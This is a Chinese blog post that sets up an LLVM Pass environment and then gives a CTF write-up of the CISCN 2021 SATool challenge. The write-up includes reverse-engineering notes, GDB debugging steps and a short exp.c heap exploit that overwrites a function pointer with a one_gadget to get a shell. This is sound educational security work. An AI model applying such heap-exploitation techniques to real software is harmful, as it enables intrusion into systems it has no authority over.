<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Loora1N">



    <meta name="description" content="Blog of Loora1N">





<title>LLVM PASS环境搭建与基本使用 | Loora1N&#39;s Blog | 鹭雨</title>



    <link rel="icon" href="/favicon.ico">



<style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=Noto+Sans+SC:wght@300;400;500;700&family=Roboto+Mono&display=swap');
</style>



    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    




    <!-- scripts list from _config.yml -->
    
    <script src="/js/menu.js"></script>
    
    <script src="/js/highlight.min.js"></script>
    
    <script src="/js/highlightjs-line-numbers.js"></script>
    
    <script src="/js/format.js"></script>
    
    <script src="/js/search.js"></script>
    




    <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
    <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>




    <script src='https://unpkg.com/valine@1.4.16/dist/Valine.min.js'></script>




  <meta name="generator" content="Hexo 6.2.0"></head>
  <body>
    <div class="mask-border">
    </div>

    <div class="wrapper">

      <div class="header">
  <div class="flex-container">
    <div class="header-inner">
      <div class="site-brand-container">
        <a href="/">
          
            Loora1N&#39;s Blog | 鹭雨
          
        </a>
      </div>
      <div id="menu-btn" class="menu-btn" onclick="toggleMenu()">
        Menu
      </div>
      <nav class="site-nav">
        <ul class="menu-list">
          
            
              <li class="menu-item">
                <a href="/">首页</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/archives/">索引</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/about/">述己</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/links/">友链</a>
              </li> 
                   
          
          
            <li class="menu-item search-btn">
              <a href="#">Search</a>
            </li>
          
        </ul>
      </nav>
    </div>
  </div>
</div>


      <div class="main">
        <div class="flex-container">
          <article id="post">

  
    <div class="post-head">
    <div class="post-info">
        <div class="tag-list">
            
        </div>
        <div class="post-title">
            
            
                LLVM PASS环境搭建与基本使用
            
            
        </div>
        <span class="post-date">
            6月 30, 2022
        </span>
    </div>
    <div class="post-img">
        
            <div class="h-line-primary"></div>
              
    </div>
</div>
    <div class="post-content">
    <h2 id="LLVM-Pass-环境搭建"><a href="#LLVM-Pass-环境搭建" class="headerlink" title="LLVM Pass 环境搭建"></a>LLVM Pass 环境搭建</h2><h3 id="预编译包的安装"><a href="#预编译包的安装" class="headerlink" title="预编译包的安装"></a>预编译包的安装</h3><p>在Ubuntu上，可以直接通过<code>apt</code>安装llvm和clang：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ sudo apt install llvm</span><br><span class="line">$ sudo apt install clang</span><br></pre></td></tr></table></figure>

<h3 id="编译安装"><a href="#编译安装" class="headerlink" title="编译安装"></a>编译安装</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> llvm-project</span><br><span class="line">$ <span class="built_in">mkdir</span> build &amp;&amp; <span class="built_in">cd</span> build</span><br><span class="line">$ cmake -G <span class="string">&quot;Unix Makefiles&quot;</span> -DLLVM_ENABLE_PROJECTS=<span class="string">&quot;clang&quot;</span> \</span><br><span class="line">    -DCMAKE_BUILD_TYPE=Release -DLLVM_TARGETS_TO_BUILD=<span class="string">&quot;X86&quot;</span> \</span><br><span class="line">    -DBUILD_SHARED_LIBS=On ../llvm</span><br><span class="line">$ make</span><br></pre></td></tr></table></figure>

<h2 id="基本操作"><a href="#基本操作" class="headerlink" title="基本操作"></a>基本操作</h2><h3 id="Hello-Pass-编写"><a href="#Hello-Pass-编写" class="headerlink" title="Hello Pass 编写"></a>Hello Pass 编写</h3><p>随意找一处作为项目文件夹Hello，并编写main.c如下所示</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">loorain</span><span class="params">()</span>&#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">pwn</span><span class="params">()</span>&#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Hello World LLVM PASS&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编写Hello.cpp如下，如下代码含义可阅读官方文档：<a target="_blank" rel="noopener" href="https://llvm.org/docs/WritingAnLLVMPass.html#introduction-what-is-a-pass">Writing an LLVM Pass — LLVM 15.0.0git documentation</a></p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/Pass.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/IR/Function.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/Support/raw_ostream.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/IR/LegacyPassManager.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;llvm/Transforms/IPO/PassManagerBuilder.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> llvm;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Hello</span> : <span class="keyword">public</span> FunctionPass &#123;</span><br><span class="line">        <span class="type">static</span> <span class="type">char</span> ID;</span><br><span class="line">        <span class="built_in">Hello</span>() : <span class="built_in">FunctionPass</span>(ID) &#123;&#125;</span><br><span class="line">        </span><br><span class="line">        <span class="function"><span class="type">bool</span> <span class="title">runOnFunction</span><span class="params">(Function &amp;F)</span> <span class="keyword">override</span> </span>&#123;</span><br><span class="line">            <span class="built_in">errs</span>() &lt;&lt; <span class="string">&quot;Hello: &quot;</span>;</span><br><span class="line">            <span class="built_in">errs</span>().<span class="built_in">write_escaped</span>(F.<span class="built_in">getName</span>()) &lt;&lt; <span class="string">&#x27;\n&#x27;</span>;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;<span class="comment">//遍历所有的函数名称，并以“Hello：&lt;函数名&gt;”的形式输出</span></span><br><span class="line">    &#125;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">char</span> Hello::ID = <span class="number">0</span>;</span><br><span class="line"><span class="comment">//for opt</span></span><br><span class="line"><span class="function"><span class="type">static</span> RegisterPass&lt;Hello&gt; <span class="title">X</span><span class="params">(<span class="string">&quot;hello&quot;</span>, <span class="string">&quot;Hello world Pass&quot;</span>, <span class="literal">false</span>, <span class="literal">false</span>)</span></span>;</span><br><span class="line"><span class="comment">//for clang</span></span><br><span class="line"><span class="function"><span class="type">static</span> llvm::RegisterStandardPasses <span class="title">Y</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    llvm::PassManagerBuilder::EP_EarlyAsPossible,</span></span></span><br><span class="line"><span class="params"><span class="function">    [](<span class="type">const</span> llvm::PassManagerBuilder &amp;Builder,</span></span></span><br><span class="line"><span class="params"><span class="function">       llvm::legacy::PassManagerBase &amp;PM) &#123; PM.add(<span class="keyword">new</span> Hello()); &#125;)</span></span>;</span><br></pre></td></tr></table></figure>

<h3 id="命令行编译"><a href="#命令行编译" class="headerlink" title="命令行编译"></a>命令行编译</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ clang `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared Hello.cpp -o LLVMHello.so `llvm-config --ldflags`   </span><br></pre></td></tr></table></figure>

<ul>
<li><code>llvm-config</code>提供了<code>CXXFLAGS</code>与<code>LDFLAGS</code>参数方便查找LLVM的头文件与库文件。 如果链接有问题，还可以用<code>llvm-config --libs</code>提供动态链接的LLVM库。 具体<code>llvm-config</code>打印了什么，请自行尝试或查找官方文档。</li>
<li><code>-fPIC -shared</code> 显然是编译动态库的必要参数。</li>
<li>因为LLVM没用到RTTI，所以用<code>-fno-rtti</code> 来让我们的Pass与之一致。</li>
<li><code>-Wl,-znodelete</code>主要是为了应对LLVM 5.0+中加载ModulePass引起segmentation fault的bug。如果你的Pass继承了ModulePass，还请务必加上。</li>
</ul>
<p>现在，你手中应该有一份编译好的LLVMHello.so了。根据刚才阅读过的官方文档的介绍，你知道可以通过命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ clang -S -emit-llvm main.c -o main.ll</span><br><span class="line"><span class="comment">#这里也可以使用&#x27;clang -c -emit-llvm main.c -o main.bc&#x27;区别在于bc文件是二进制文件无法阅读</span></span><br><span class="line"><span class="variable">$opt</span> -load LLVMHello.so -hello main.ll -o main</span><br><span class="line"><span class="comment">#这里的 -hello由Hello.cpp中的static RegisterPass&lt;Hello&gt; X参数决定</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>在使用opt进行动态链接时，可能会出现错误：Error opening ‘LLVMHello.so’: LLVMHello.so: cannot open shared object file: No such file or directory</p>
<p>这实际是由于linux中动态链接库的存放地点一般比较固定，无法在默认地址搜索到名为LLVMHello.so的动态链接库，那么我们可以在.bashrc或.zshrc中加入代表当前目录的地址，如下所示：</p>
<p>export LD_LIBRARY_PATH&#x3D;$LD_LIBRARY_PATH:.  </p>
</blockquote>
<p><img src="/img/article/llvmCreate/1.png" alt="效果图"></p>
<p>如图所示，我们确实输出了main.c中所有函数名称</p>
<h2 id="例题一：CISCN-2021-SATool"><a href="#例题一：CISCN-2021-SATool" class="headerlink" title="例题一：CISCN 2021 SATool"></a>例题一：CISCN 2021 SATool</h2><h3 id="逆向分析"><a href="#逆向分析" class="headerlink" title="逆向分析"></a>逆向分析</h3><p>这类题目对我们有用的部分opt和so文件，逆向分析SAPass.so文件</p>
<p><img src="/img/article/llvmCreate/image-20220630204900814.png" alt="image-20220630204900814"></p>
<p>在<code>start</code>函数中，主要内容是注册了一些函数，没什么有用的信息。在分析so文件时，一般重点是分析重写的<code>runOnFunction</code>函数，我们大多可以在函数表的最下方找到重写的<code>runOnFunction</code>函数</p>
<p><img src="/img/article/llvmCreate/image-20220630205306216.png" alt="image-20220630205306216"></p>
<p>在这里我们看到<code>sub_19D0</code>就是我们要找的函数，分析函数内容，这也是在我看来LLVM PASS 类题目最核心的地方——代码逆向分析。毕竟一个函数就要整整550行，能够快速地筛选什么是关键信息，什么是垃圾信息是关键。</p>
<p><img src="/img/article/llvmCreate/image-20220630210526791.png" alt="image-20220630210526791"></p>
<p>函数一开头就判断了我们的函数名称是不是<code>B4ckDo0r</code>, 这里由于Name的类型是QWORD存储，并非直接字符串，所以要反过来读。之后又分了5个操作分别是save, takeway, stealkey, fakekey, run.</p>
<p>在save操作中，进行了堆块的创建</p>
<p><img src="/img/article/llvmCreate/image-20220630211613541.png" alt="image-20220630211613541"></p>
<p>在stealkey中，将刚刚申请的heap中内容给了204100（takeway也是跳转到了stealkey中）</p>
<p><img src="/img/article/llvmCreate/image-20220630211950647.png" alt="image-20220630211950647"></p>
<p>在fakekey中，将heap的内容加上了参数的值，即可编辑heap的内容（这里的heap_con就是204100，我改了个名字）</p>
<p><img src="/img/article/llvmCreate/image-20220630212337680.png" alt="image-20220630212337680"></p>
<p>run函数，就是直接call *heap</p>
<p><img src="/img/article/llvmCreate/image-20220630213353185.png" alt="image-20220630213353185"></p>
<h3 id="GDB-调试LLVM-PASS"><a href="#GDB-调试LLVM-PASS" class="headerlink" title="GDB 调试LLVM PASS"></a>GDB 调试LLVM PASS</h3><p>首先我们编写部分exp，类似我们动态做普通的PWN题目。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ clang -S -emit-llvm exp.c -o exp.ll -v</span><br><span class="line"><span class="comment">#这里加上 -v 可以显示出详细参数</span></span><br></pre></td></tr></table></figure>

<p>我们主要途中圈的这一部分</p>
<p><img src="/img/article/llvmCreate/image-20220630221103947.png" alt="image-20220630221103947"></p>
<blockquote>
<p>-triple x86_64-pc-linux-gnu -emit-llvm -disable-free -disable-llvm-verifier -discard-value-names -main-file-name exp.c -mrelocation-model static -mthread-model posix -mframe-pointer&#x3D;all -fmath-errno -fno-rounding-math -masm-verbose -mconstructor-aliases -munwind-tables -target-cpu x86-64 -dwarf-column-info -fno-split-dwarf-inlining -debugger-tuning&#x3D;gdb -v -resource-dir &#x2F;usr&#x2F;lib&#x2F;llvm-10&#x2F;lib&#x2F;clang&#x2F;10.0.0 -internal-isystem &#x2F;usr&#x2F;local&#x2F;include -internal-isystem &#x2F;usr&#x2F;lib&#x2F;llvm-10&#x2F;lib&#x2F;clang&#x2F;10.0.0&#x2F;include -internal-externc-isystem &#x2F;usr&#x2F;include&#x2F;x86_64-linux-gnu -internal-externc-isystem &#x2F;include -internal-externc-isystem &#x2F;usr&#x2F;include -fdebug-compilation-dir &#x2F;home&#x2F;loorain&#x2F;ciscn&#x2F;CISCN_2021_pwn&#x2F;SATool_附件 -ferror-limit 19 -fmessage-length 0 -fgnuc-version&#x3D;4.2.1 -fobjc-runtime&#x3D;gcc -fdiagnostics-show-option -fcolor-diagnostics -faddrsig -o exp.ll -x c exp.c</p>
</blockquote>
<p>在另一终端中使用如下指令,即可开始调试</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ gdb clang</span><br><span class="line">GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> args -triple x86_64-pc-linux-gnu -emit-llvm -disable-free -disable-llvm-verifier -discard-value-names -main-file-name exp.c -mrelocation-model static -mthread-model posix -mframe-pointer=all -fmath-errno -fno-rounding-math -masm-verbose -mconstructor-aliases -munwind-tables -target-cpu x86-64 -dwarf-column-info -fno-split-dwarf-inlining -debugger-tuning=gdb -v -resource-dir /usr/lib/llvm-10/lib/clang/10.0.0 -internal-isystem /usr/local/include -internal-isystem /usr/lib/llvm-10/lib/clang/10.0.0/include -internal-externc-isystem /usr/include/x86_64-linux-gnu -internal-externc-isystem /include -internal-externc-isystem /usr/include -fdebug-compilation-dir /home/loorain/ciscn/CISCN_2021_pwn/SATool_附件 -ferror-limit 19 -fmessage-length 0 -fgnuc-version=4.2.1 -fobjc-runtime=gcc -fdiagnostics-show-option -fcolor-diagnostics -faddrsig -o exp.ll -x c exp.c</span><br><span class="line">pwndbg&gt; b main</span><br><span class="line">Breakpoint 1 at 0x40da90</span><br><span class="line">pwndbg&gt; n</span><br><span class="line">The program is not being run.</span><br><span class="line">pwndbg&gt; r</span><br></pre></td></tr></table></figure>

<h3 id="解题思路-amp-EXP"><a href="#解题思路-amp-EXP" class="headerlink" title="解题思路&amp;EXP"></a>解题思路&amp;EXP</h3><ul>
<li><p>先申请多个chunk讲tache腾空，以申请unsortbin中的chunk</p>
</li>
<li><p>在申请unsortbin时，第一个参数放置’\x00‘以此保留libc信息</p>
</li>
<li><p>利用stealkey和fakekey将chunk中的fd更改为onegadget</p>
</li>
<li><p>然后利用run直接getshell</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">run</span><span class="params">()</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">save</span><span class="params">(<span class="type">char</span> *a1,<span class="type">char</span> *a2)</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">fakekey</span><span class="params">(int64)</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">takeaway</span><span class="params">(<span class="type">char</span> *a1)</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">stealkey</span><span class="params">()</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">B4ckDo0r</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">        save(<span class="string">&quot;aaaa&quot;</span>,<span class="string">&quot;aaaa&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;aaddd&quot;</span>,<span class="string">&quot;aadd&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;ssss&quot;</span>,<span class="string">&quot;sss&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;ssss&quot;</span>,<span class="string">&quot;sssss&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;sssss&quot;</span>,<span class="string">&quot;sssss&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;sssss&quot;</span>,<span class="string">&quot;sssss&quot;</span>);</span><br><span class="line">    save(<span class="string">&quot;sssss&quot;</span>,<span class="string">&quot;sssss&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;\x00&quot;</span>,<span class="string">&quot;ssssss&quot;</span>);</span><br><span class="line">        stealkey();</span><br><span class="line">        fakekey(<span class="number">-0x2E19b4</span>);</span><br><span class="line">        run();</span><br><span class="line"> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ul>

</div> 

<script>
    window.onload = detectors();
</script>
    <div class="post-footer">
    <div class="h-line-primary"></div>
    <nav class="post-nav">
        <div class="prev-item">
           
                <div class="icon arrow-left"></div>
                <div class="post-link">
                    <a href="/2022/09/05/%E8%90%8C%E6%96%B0%E6%89%8B%E5%86%8C-PWN%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">Prev</a>
                </div>
            
        </div>
        <div class="next-item">
            
                <div class="icon arrow-right"></div>
                <div class="post-link">
                  <a href="/2022/06/08/%E5%88%86%E7%BB%84%E5%AF%86%E7%A0%81%E7%9A%84%E4%BA%94%E7%A7%8D%E5%B7%A5%E4%BD%9C%E6%A8%A1%E5%BC%8F/">Next</a>  
                </div>  
            
        </div>
    </nav>
</div>

    
      <div class="post-comment">

    
        <div id="vcomments"></div>
        <script>
            var META = ['nick', 'mail', 'link'];
            var meta = 'nick,mail';
            meta = meta.split(',').filter(item => {
                return META.includes(item);
            });
            new Valine({
                el: '#vcomments',
                appId: 'rb5WOYmmPvNLWkXLJIiqi1p0-gzGzoHsz',
                appKey: 'B0j55vucTVteHiiUJeIL8Vx8',
                lang: 'zh-CN',
                placeholder: '这里是评论区:)',
                avatar: 'mp',
                meta: meta
            })
        </script>    
     

     
    
    

</div>
     
  
</article>
        </div>
      </div>
      
      <div class="footer">
    <div class="flex-container">
        <div class="footer-text">
            
            
            
                Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & <a target="_blank" rel="noopener" href="https://github.com/zoeingwingkei/frame/">Frame</a>
                
        </div>
    </div>
</div>

    </div>

    
      <div class="search-popup">
    <div class="search-popup-overlay">  
    </div>
    <div class="search-popup-window" >
        <div class="search-header">
            <div class="search-input-container">
              <input autocomplete="off" autocapitalize="off" maxlength="80"
                     placeholder="Search Anything" spellcheck="false"
                     type="search" class="search-input">
            </div>
            <div class="search-close-btn">
                <div class="icon close-btn"></div>
            </div>
        </div>
        <div class="search-result-container">
        </div>
    </div>
</div>

<script>
    const searchConfig = {
        path             : "/search.xml",
        top_n_per_article: "1",
        unescape         : "false",
        trigger: "auto",
        preload: "false"
    }
</script>
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js"></script>
<script src="/js/search.js"></script>
    
    

  <!-- hexo injector body_end start -->
  <script data-pjax src="https://cdn.jsdelivr.net/gh/Zfour/hexo-github-calendar@1.21/hexo_githubcalendar.js"></script>
  <script data-pjax>
        function GithubCalendarConfig(){
            var git_githubapiurl ="https://python-github-calendar-api.vercel.app/api?Loora1N";
            var git_color =['#ebedf0', '#fdcdec', '#fc9bd9', '#fa6ac5', '#f838b2', '#f5089f', '#c4067e', '#92055e', '#540336', '#48022f', '#30021f'];
            var git_user ="Loora1N";
            var parent_div_git = document.getElementById('recent-posts');
            var git_div_html = '<div class="recent-post-item" style="width:100%;height:auto;padding:10px;"><div id="github_loading" style="width:10%;height:100%;margin:0 auto;display: block"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"  viewBox="0 0 50 50" style="enable-background:new 0 0 50 50" xml:space="preserve"><path fill="#d0d0d0" d="M25.251,6.461c-10.318,0-18.683,8.365-18.683,18.683h4.068c0-8.071,6.543-14.615,14.615-14.615V6.461z" transform="rotate(275.098 25 25)"><animateTransform attributeType="xml" attributeName="transform" type="rotate" from="0 25 25" to="360 25 25" dur="0.6s" repeatCount="indefinite"></animateTransform></path></svg></div><div id="github_container"></div></div>';
            if(parent_div_git && location.pathname =='/about/'){
                console.log('已挂载github calendar')
                // parent_div_git.innerHTML=git_div_html+parent_div_git.innerHTML // 无报错，但不影响使用(支持pjax跳转)
                parent_div_git.insertAdjacentHTML("afterbegin",git_div_html) // 有报错，但不影响使用(支持pjax跳转)
            };
            GithubCalendar(git_githubapiurl,git_color,git_user)
        }
        if(document.getElementById('recent-posts')){
            GithubCalendarConfig()
        }
    </script>
    <style>#github_container{min-height:280px}@media screen and (max-width:650px) {#github_container{background-image:;min-height:0px}}</style>
    <style></style><!-- hexo injector body_end end --></body>
</html>
